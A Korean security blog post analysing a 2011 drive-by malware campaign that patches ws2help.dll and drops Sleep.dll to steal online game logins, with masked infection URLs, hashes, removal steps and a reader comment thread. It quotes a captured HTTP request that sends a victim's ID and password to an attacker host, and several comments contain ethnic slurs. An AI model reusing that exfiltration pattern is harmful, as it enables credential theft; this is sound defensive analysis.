본문 바로가기

벌새::Analysis

온라인 게임 계정 탈취 목적의 ws2help.dll, Sleep.dll 악성코드 유포 (2011.7.23)

매주 주말마다 벌어지는 중국발 온라인 게임 계정 탈취 목적의 악성코드 유포가 꾸준히 발견되고 있습니다.

이번 시간에는 6월경부터 발견되고 있는 것으로 알려진 ws2help.dll 시스템 파일 패치 및 Sleep.dll 파일을 이용한 보안 제품 무력화와 온라인 게임 계정 정보 수집에 대한 내용을 살펴보도록 하겠습니다.

해당 악성코드와 관련된 이전의 게시글을 함께 참고하시면 이해하시는데 도움이 되시리라 생각됩니다.

[악성코드 유포 경로]

h**p://www.ci**se***.com/common/com_cineseoul.js
 ㄴ h**p://205.2*9.145.*2*/V/G.html
   ㄴ h**p://205.2*9.145.*2*/V/swfobject.js
   ㄴ h**p://205.2*9.145.*2*/V/f102.htm
     ㄴ h**p://205.2*9.145.*2*/V/1.swf
     ㄴ h**p://205.2*9.145.*2*/V/2.swf
   ㄴ h**p://205.2*9.145.*2*/V/x.htm
     ㄴ h**p://205.2*9.145.*2*/V/K.Js
     ㄴ h**p://205.2*9.145.*2*/V/V.exe
   ㄴ h**p://count48.51yes.com/click.aspx?id=481145757&logo=1

해당 악성코드는 영화 관련, 인터넷 신문 등 다양한 사이트에서 Internet Explorer 웹 브라우저 취약점, Adobe Flash Player 취약점을 이용하여 보안 패치가 이루어지지 않은 사용자가 접속시 자동으로 감염시키도록 구성되어 있습니다.

swf 파일에 포함된 ShellCode

해당 유포에 사용된 1.swf, 2.swf 파일 내부에는 쉘코드(ShellCode)가 포함되어 있어, Adobe Flash Player 최신 버전을 사용하지 않는 사용자의 경우 자동으로 감염될 수 있습니다.

참고로 해당 파일에 대하여 알약(ALYac) 2.0 보안 제품에서는 Exploit.SWF.ShellCode.Gen 진단명으로 진단되고 있습니다.

추가로 Internet Explorer 웹 브라우저 취약점을 이용한 x.htm 스크립트에 대하여 알약(ALYac) 2.0 보안 제품에서는 Exploit.JS.CVE-2010-0806.A 진단명으로 진단되고 있으며, 최종적으로 암호화된 V.exe 파일을 다운로드하여 시스템 감염을 유발하고 있습니다.

V.exe 파일의 XOR된 설치 파일(MD5 : 2041331bb0ecb3bd2938e7bbdf60b6e2)에 대하여 avast! 보안 제품에서는 Win32:OnLineGames-FZQ [Trj] (VirScan.org : 11/37) 진단명으로 진단되고 있습니다.

[생성 파일 및 진단 정보]

C:\WINDOWS\system32\2011723102215.dll
※ 해당 파일은 2011(9~10자리 숫자).dll 파일 형태이며, ws2help.dll 백업 파일입니다.

C:\WINDOWS\system32\Sleep.dll
 - MD5 : e6f7fe2bff44a4c9adb447093d6bd32c
 - ALYac 2.0 : Spyware.OnlineGames.ws (VirusTotal : 19/43)

C:\WINDOWS\system32\ws2help.dll :: 파일 변경(악성 파일)
 - MD5 : 4e6262aaee7b1764ffba1ac854831428
 - AhnLab V3 : Win-Trojan/Patched.19968.F (VirusTotal : 3/43)

C:\WINDOWS\system32\ws3help.dll
※ 해당 파일은 ws2help.dll 백업 파일로 정상 파일입니다.


감염된 PC에서는 정상적인 ws2help.dll(Windows Socket 2.0 Helper for Windows NT) 시스템 파일을 ws3help.dll 파일로 백업을 하고, ws2help.dll 파일은 악성 파일로 패치가 이루어지도록 구성되어 있습니다.

이전과 다르게 단순히 파일 크기로는 구분하기 어려우면 파일의 수정한 날짜로 정상 파일과 악성 파일을 짐작할 수 있습니다.

악성 ws2help.dll 파일의 경우 파일 버전이 5.1.2600.2180 버전이며, 원래 정상적인 시스템 파일(Windows XP SP3 기준)은 5.1.2600.5512 버전으로 표시가 되고 있습니다.

ws2help.dll 시스템 파일 패치로 인하여 감염된 환경에서는 재부팅 후부터 Windows 시작시 느린 부팅이 이루어지고 있는 특징을 발견할 수 있습니다.

  1. 바탕 화면 아이콘 이동 불가
  2. Internet Explorer 웹 브라우저 창 미생성(iexplore.exe 프로세스는 실행)
  3. Windows 보안 센터 무력화
  4. 작업 표시줄 기능 이상(빠른 실행 문제, 프로그램 최소화시 창 처리 문제 등)

특히 무력화된 Windows 보안 센터는 사용자가 Windows 방화벽을 실행시키려고 할 경우 정상적으로 동작하지 않는 것을 확인할 수 있습니다.

Sleep.dll

Sleep.dll 파일은 국내 인터넷 사용자들이 많이 사용하거나 자신들의 진단에 영향을 미치는 알약(ALYac), 네이버 백신, V3, 바이러스 체이서(Virus Chaser) 보안 제품의 기능을 무력화하는 기능이 포함되어 있습니다.

또한 사용자가 Internet Explorer 웹 브라우저(iexplore.exe)와 같은 각종 프로세스에 Sleep.dll 모듈을 인젝션(Injection)하여 파일에 등록된 특정 온라인 게임(피망, 넥슨, 한게임, 넷마블 등)에 접속할 경우 계정 정보를 탈취하는 기능을 포함하고 있습니다.

[넷마블 계정 탈취 예시]

GET /msn/net/mail.asp?a1=1&a3=(사용자 ID)&a4=(비밀번호)&r=1814&a12=2011722210619 HTTP/1.1
User-Agent: WinInet
Host: www.zuozhumsn.com
Cache-Control: no-cache

현재 미국(USA)에 위치한 205.209.142.29로 수집된 계정 정보를 이메일 발송하는 동작을 확인할 수 있습니다.

해당 악성코드에 감염된 사용자 중 사용하는 보안 제품이 비정상적으로 동작하여 문제를 해결할 수 없는 경우에는, 보안 업체에서 제공하는 전용 백신을 이용하여 치료하시기 바라며 수동으로 문제를 해결하기 원하시는 분들은 다음의 절차에 따르시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태로 진행하시기 바랍니다.)

1. 윈도우 탐색기를 통해 C:\WINDOWS\system32\Sleep.dll 파일을 Sleep.dll- 파일로 확장자를 변경합니다.

2. C:\WINDOWS\system32\ws2help.dll 파일을 ws2help.dll- 파일로 확장자를 변경합니다.

3. C:\WINDOWS\system32\ws3help.dll 파일을 ws2help.dll 파일로 파일명을 변경합니다.

4. 시스템 재부팅을 합니다.

5. 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\system32\2011723102215.dll
  • C:\WINDOWS\system32\Sleep.dll-
  • C:\WINDOWS\system32\ws2help.dll-

현재 이들 악성코드는 하우리 바이로봇(Hauri ViRobot) 보안 제품 동작에는 영향을 주지 않는 것으로 알려져 있으므로, 해당 제품을 이용하여 진단 및 치료를 하시는 것도 좋은 해결 방법 중의 하나입니다.

정상적인 인터넷 사이트가 해킹을 당하여 취약점을 이용한 악성코드를 유포하는 행위는 사용자 입장에서는 보안 제품 중심의 대응보다는 Windows 보안 업데이트, 각종 응용 프로그램(Adobe Flash Player, Adobe Reader 등) 최신 버전 사용을 통해 근본적으로 예방할 수 있으므로 항상 업데이트를 체크하는 습관이 중요하겠습니다.

  • 이전 댓글 더보기
  • 도와주십시요! 2011.07.30 23:43 댓글주소 수정/삭제 댓글쓰기

    문제는 바이러스가 나오지 않는다는것이고 몇번이나 복원을 해도 시작표시줄그리고 아이콘이 안뜨네요...ㅠㅠ 프로세서에 explore.exe는 뜨는뎁 ㅠㅠ

    • 말씀하신 블로그쪽을 보니 원격 조정과 관련된 악성 파일이 있는 것이 확인되었습니다.

      현재 보안 제품에서 대부분 진단되지 않는 부분이 있어서 조만간 보안 제품에서 진단하도록 신고를 넣겠습니다.

  • 도와주십시요! 2011.07.30 23:50 댓글주소 수정/삭제 댓글쓰기

    벌새님 덕분에 보호나라라는 좋은곳도 알아갑니다...주말 푹쉬세요^^

  • 도와주십시요! 2011.07.31 09:00 댓글주소 수정/삭제 댓글쓰기

    벌새님 정말 감사합니다...
    이 인사 밖에 할수 있는게 없는거 같네요...
    원격 조정이라면 컴퓨터를 보고 조정한다는 건데
    그렇다면 계정을 해킹할수도 있는 거네요...
    아 계정부터 다 바꿔야 겠습니다...
    감사합니다...
    주말 잘보내십시요.
    아 참! 블로그의 악성파일에 감염되면 저처럼 시작표시줄이 없어질수 있는겁니까?

    • 아직 프로그램을 자세히 살펴보지 않았습니다.

      대략적인 것으로 국내에서 제작된 악성 파일은 분명합니다.

      감염시 추가적인 다운로드를 통해 원격 조정을 통해 상대방 PC를 공격자 의도대로 조정할 것으로 보입니다.

      증상은 역시 공격자의 의지에 달려있으리라 보여집니다.

      차후 분석글이 가능하면 블로그에 공개하겠습니다.

  • 도와주십시요! 2011.07.31 18:30 댓글주소 수정/삭제 댓글쓰기

    아 정말 감사합니다!!!
    제 컴퓨터는 보호나라에 원격 맡겨둬야 겠네요.
    시작표시줄과 아이콘때문에 작업관리자로 이렇게 글을 쓰고 있답니다~
    감사합니다~

  • 한상권 2011.07.31 22:59 댓글주소 수정/삭제 댓글쓰기

    안녕하세요.
    위에 글 쓰신 윤찬웅씨처럼 확장자 변경 두개 하고나서 깜빡 세번째의 파일명 변경을 하지 않은채 재부팅 한다고 껐더니 다시 부팅이 안되네요. 아... 좀 침착하게 했어야 하는데 이 메모를 폰에서 보면서 했더니 글씨가 작아서 그랬는지 이런 실수를 했습니다. 링크해부신 알약 FAQ에 보니 윈도우 설치나 시동 씨디를 사용해서 부팅을 하면 된다고 써있는데요, 제 컴터가 누가 조립을 해준 것인데 그 시디들이 없습니다. 컴119같은 류의 출장 업체에 이 내용을 이야기하면 되겠지요? 아... 워낙 하드웨어쪽으로 컴맹이라 참 답답하네요. ㅜㅜ

    • 개인적으로 그럼 출장업체에 맡기면 돈만 엄청 들고 그러실 것 같습니다.

      인터넷 상에서 포멧하는 방식을 찾아보시면 스크린샷으로 아주 잘 소개한 곳이 있을겁니다.

      시디가 없다면 주변에서 윈도우 설치할 수 있는 분을 찾고 식사 대접 한 번 해주는 대가로 하시는 것이 좋을텐데..

  • 진심으로 감사합니다. 2011.08.05 23:22 댓글주소 수정/삭제 댓글쓰기

    울지않는벌새님 진심으로 감사합니다. 저는 컴퓨터로 하루벌어 하루먹고사는 사람인데 이렇게 컴퓨터가 먹통이되어버리니깐 덜컥 겁부터 나더라구요.. 쉽게 사람을 부를까하다가 스마트폰으로 검색을했는데 정말 좋은 해설과함께 치료방법을 알려주셔서 진심으로 감사합니다. 이렇게 남의 블로그에 글을 남기는것이 사실 처음인데 진심으로 감사해서 이렇게 글을올립니다. 마지막으로 진심으로 감사드립니다. 복받으실거에요

  • 정말감사합니다 ㅠㅠ 2011.08.06 14:43 댓글주소 수정/삭제 댓글쓰기

    벌새님 사랑합니다 ㅠㅠ 네이버에 쳐도 링크 눌러도 들어가지지도 않고 안철수나 다른 백신 사이트는 들어가지지도 않고.. 진짜 절망적이었는데
    힘겹게 주소창에 주소 치고 따라하니까 원래대로 돌아오더군요 ㅠㅠ

    진심으로 감사드리구요 게임도 안하는데 이런게 왜걸리는지 ;;;
    아 그리고 저 sleep.dll파일이 원래 없는데 왜그런거죠??

    • 게임을 하지 않아도 사용자가 해킹된 웹하드, 언론사 사이트 등을 방문할 경우 자동으로 감염될 수 있습니다.

      아마 보안 패치를 제대로 하지 않고 인터넷을 이용하는 것으로 보이므로 보안 패치를 반드시 하시기 바랍니다.

      그리고 없는 파일은 해당 악성코드가 아닌 다른 변종으로 보입니다.

      참고로 수동으로 문제 해결 후 반드시 보안 제품으로 정밀 검사를 해보시기 바랍니다.^^

  • 가브리앨 2011.08.06 14:59 댓글주소 수정/삭제 댓글쓰기

    확장자명변경후에 재부팅햇는데 윈도우로딩만 무한반복입니다ㅜ

    • 아마 사용자가 확장자 변경 과정에서 정상적인 ws2help.dll 파일 생성이 되지 않은 것으로 보입니다.

      원래 백업된 ws3help.dll 파일을 ws2help.dll로 변경을 하셔야 합니다.

      그러지 않으면 윈도우 부팅에 문제가 발생할 수 있습니다.

      이런 문제 해결을 위해서는 http://alyac.altools.co.kr/Public/Customer/FaqView.aspx?id=1516&subcategory=0&keyword= 내용을 참고하여 시스템 파일을 복원하시기 바랍니다.

  • 게임핵 2011.08.06 15:50 댓글주소 수정/삭제 댓글쓰기

    재부팅하니까 되네요! 정말 감사합니다 이것때문에 근 세시간을 치료방법 찾아다녔는데..ㅠ.ㅠ 컴맹이라 아무것도 몰라서 무작정 껐다 켰다 하다가 다른컴으로 인터넷에 검색해보니 V3를 usb로 옮겨서 실행해보라느니.. usb는 인식도 안되는데..ㅠㅠ
    마지막으로 이 블로그에 나와있는데로 해보고 안되면 포맷맡기려고했는데 님덕에 몇만원 굳었네요..ㅠ.ㅠ 앞으론 업뎃이랑 바이러스검사도 자주하고 혹시라도 컴에 문제생기면 검색좀 해보고 맡기던지 해야겠어요

  • 잘안되요ㅠㅠ 2011.08.06 17:06 댓글주소 수정/삭제 댓글쓰기

    저희컴이랑 똑같네요 그래서 이대로 해볼려고 보조컴으로 보면서 하고있는데요 확장자를 바꿀줄 모르겠어요ㅠㅠㅠ 거기서 지금 30분째 ㅠㅠㅠㅠ 도와주세요

    • 확장자를 변경하시려면 해당 파일을 선택하여 마우스 우클릭을 하시고 이름 바꾸기를 통해 변경하시면 됩니다.

      단, 윈도우 기본값으로 알려진 파일 확장자가 안보이므로 폴더 옵션에서 알려진 파일 형식의 파일 확장명 숨기기 항목의 체크를 해제하시기 바랍니다.

  • 중국어 2011.08.08 01:20 댓글주소 수정/삭제 댓글쓰기

    ws2help.dll 등록 정보
    파일 버전: 5.1.2600.2180
    기타 버전 정보
    항목 이름: 값:
    언어 중국어 (중국)


    이게 바이러스인거죠? 아오...게임 해킹당했는데 이 중국 개XX 때문인거죠? 중국이란 나라 정말 갈수록 싫어요.
    정말 골때리는건
    만든 날짜: 2004년 8월 14일 토요일, 오후 10:00:00
    수정한 날짜: 2011년 7월 23일 토요일, 오전 3:39:22
    액세스한 날짜: 2011년 8월 8일 오늘, 오전 1:05:50

    2004년에 걸려서 이제야 해킹당하다니 생체바이러스도 아니고 제대로 잠복기네요. 2011년 7월 23일 이때쯤에 해킹당했는데 딱 맞아떨어지고요.(정말 컴터 오래 썼네요ㅋㅋㅋ) 이거 들어보니까 fuckXX란 이름의 이메일로 전송된다는데 그 중궈 개XX 때려잡고싶네요... 자꾸 험한 말 해서 정말 죄송합니다. 근데 정말 화가 나는건 어쩔 수 없어요ㅠㅠ

    어쨌든 좋은 정보 감사합니다.

  • 피망 2011.08.08 18:26 댓글주소 수정/삭제 댓글쓰기

    정말감사합니다 완벽히 같은증상이여서 따라해보았더니
    고쳐졌어요 너무너무 감사해요 그런데
    5번에 수동으로 삭제해야하는 파일세개는 재부팅한 컴퓨터에 찾아보아도 없더라구요..
    지우지않아도 컴퓨터가 되긴 되는데.. 안지워도 되나요? 아니면 저절로 지워진건가요?
    날짜적힌 파일은 비슷한게 잇던데 2011뒤에 이상한 번호들이잇어서 선뜻못지웟어요 ㅠㅠ

    • sleep.dll 파일은 악성 파일로 알려져 있습니다.

      하지만 ws2help.dll 패치를 통한 악성코드 유포는 변종이 많아서 다른 파일명으로 존재할 수 있습니다.

      그러므로 국내 유명 보안 제품을 이용하여 정밀 검사를 반드시 하시기 바랍니다.

  • 중궈 타도 2011.08.09 00:49 댓글주소 수정/삭제 댓글쓰기

    벌새님 완전 감사하네요 참 스맛폰이 좋긴 좋습니다 ㅋㅋㅋ 바이러스 먹으니 인터넷 창이 안떠서 어뜨케 손쓸방법이 없었는데 스맛폰으로 검색하니 벌새님 티스토리가 뜨네요 완던 잘됩니다 성질나서 그냥 원도우 깔끔히 밀어버릴려다가 벌새님 티스토리 찾았내요 진짜 감사합니다 중궈 놈들 진짜 찾아서 전방 수류탄 하고싶네요

    • 중궈 타도 2011.08.09 00:52 댓글주소 수정/삭제

      알약으로 검색해도 이 바이러스 들은 안잡히네요 안철수 바이러스 연구소에서 게임핵 전용 백신을 무료 배포하던데 거긴 잡힌다는데 참고들 하세요

    • 감사합니다. 스마트폰이 이럴 때 정말 유용하겠군요.^^

  • ㅠㅠ 2011.08.11 20:34 댓글주소 수정/삭제 댓글쓰기

    sleep.dll파일은 확장자명을바꾸었는데 전ws3help.dll도있고 2도있어서 이름을바꾸면 이미같은이름이있다고 바뀰수가없네요...아 이대로포맷할순없는데 어떡하내요?

  • 흐잉 이글을 미리 봤으면 2011.08.17 15:47 댓글주소 수정/삭제 댓글쓰기

    이미 털린 후 이글을 봤네요 ㅠ_ㅠ
    이제부터는 보안에 관심을 깊게 두어야 겠어요 ㅠㅠ

  • 어렵네요?;; 2011.08.20 00:45 댓글주소 수정/삭제 댓글쓰기

    그런데 해킹 한 번 당하고 정보가 털리면 대처할 방법은 없는것인가요?

    • 한 번 빠져나간 정보는 돌아오지 않습니다.

      당하시면 비번 교체하시고, 보안 패치를 주기적으로 체크해서 항상 최신으로 유지하는 방법 외에는 없죠.

  • 리키안 2011.09.04 07:56 댓글주소 수정/삭제 댓글쓰기

    저같은 경우에는 ws3help.dll 도 없고 속성들어가서 봤는데 번호도 같은데 용량이 다르더라구요 그래서 이상하다 했는데 ws2helpxp.dll로 원본 파일을 복사해논걸 찾게되서 말씀하신대로 파일명을 바꿔서 고쳤습니다.
    이 글을 못봤다면 이런 시도도 못했을꺼예요 혹시나 ws3help.dll 이 없으신분들은
    ws2helpxp.dll을 한번 찾아보세요 정보 유용하게 잘 썼습니다 감사합니다

    • 안녕하세요.

      말씀처럼 이번주에는 ws2helpxp.dll 파일을 이용한 변종이 유포되고 있습니다.

      해당 내용에 대하여 따로 포스팅할 예정입니다.

      정보 감사합니다.^^

  • 리키안 2011.09.04 10:25 댓글주소 수정/삭제 댓글쓰기

    이미 오류는 수정했는데 다시 한번 들러봤어요

    답글까지 달아주시고. .

    평소에 아무생각 없이 쓰던 인터넷도 안되니까 참 관리를 잘해야겠다는 생각도

    들고. . 아무것도 모르지만요 ㅎ 요즘 많이 유포되고 있는 바이러스인거 같은데

    자기만 고치는게 아니라 이렇게 자세하게 글까지 남겨주시니 저같은 사람도

    쉽게 해결할 수 있는거 같아요

    평소엔 댓글 이런거 진짜 귀찮아서 안다는데 글 다시 한번 읽어보고 저도

    좀 바뀐거 같아요 남을 한번 더 생각하게 되네요

    여러모로 감사드려요 블로그 한번 둘러보면서 많이 배우고싶네요

    완전 컴맹이라 ㅎ

    여튼 감사하고 즐거운 하루 보내시길 바래요

  • 2011.09.17 19:08 댓글주소 수정/삭제 댓글쓰기

    정말 감사합니다 자주 피해봤었는데 덕분에 해결했어요!

  • ㅎㅎ 2011.10.08 15:00 댓글주소 수정/삭제 댓글쓰기

    처음에 어떡하지 걱정햇는데 저는 v3가 깔려잇어서 그걸로 치료햇더니 지금 잘되요~

    • 다행이군요. V3가 설치되어 있어도 감염 원인이 윈도우 보안 패치, Adobe Flash Player 최신 버전을 사용하지 않아서 감염되었을 수 있습니다.

      반드시 최신 업데이트를 모두 체크하시기 바랍니다.^^